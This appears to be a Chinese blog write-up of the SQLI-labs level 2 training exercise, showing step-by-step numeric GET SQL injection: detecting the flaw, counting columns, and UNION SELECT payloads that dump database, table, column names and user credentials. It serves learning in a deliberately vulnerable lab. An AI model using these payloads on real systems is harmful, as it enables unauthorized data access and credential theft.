SQLI-labs-第二关

目录

知识点:数字型get注入

 1、在url中输入?id=1 

 2、判断注入点

3、判断目前表的字段数

 4、判断回显位置

 5、爆库名

 6、爆表名

 7、爆字段名,以users表为例

​编辑8、爆值


知识点:数字型get注入

思路:

SQLI-labs-第二关_第1张图片

 1、在url中输入?id=1 

SQLI-labs-第二关_第2张图片

 2、判断注入点

输入?id=1'

SQLI-labs-第二关_第3张图片

 爆出数据库语句语法错误,说明这里存在数据库漏洞,后面加了注释符,还是爆出错误,说明不是单引号的错误,可以尝试一下是否为双引号

SQLI-labs-第二关_第4张图片

 单引号和双引号都会报错,那可能是数字型注入

SQLI-labs-第二关_第5张图片

 这里回显正常

SQLI-labs-第二关_第6张图片

 使用and 1=2,数据没有回显出来,说明这里存在数字型注入

3、判断目前表的字段数

?id=1 and 1=1 order by 3--+ ,没有报错

SQLI-labs-第二关_第7张图片

 ?id=1 and 1=1 order by 4--+   报错,说明当前表有3个字段

SQLI-labs-第二关_第8张图片

 4、判断回显位置

?id=1 and 1=2 union select 1,2,3 --+

SQLI-labs-第二关_第9张图片

 5、爆库名

?id=1 and 1=2 union select 1,2,database() --+

SQLI-labs-第二关_第10张图片

 6、爆表名

?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

SQLI-labs-第二关_第11张图片

 7、爆字段名,以users表为例

?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

SQLI-labs-第二关_第12张图片8、爆值

?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+

SQLI-labs-第二关_第13张图片

 以此类推,就可以的得到这个数据库所有的值了


这篇文章就先写到这里了,欢迎批评指正

你可能感兴趣的:(渗透学习之路,数据库,web安全,sql)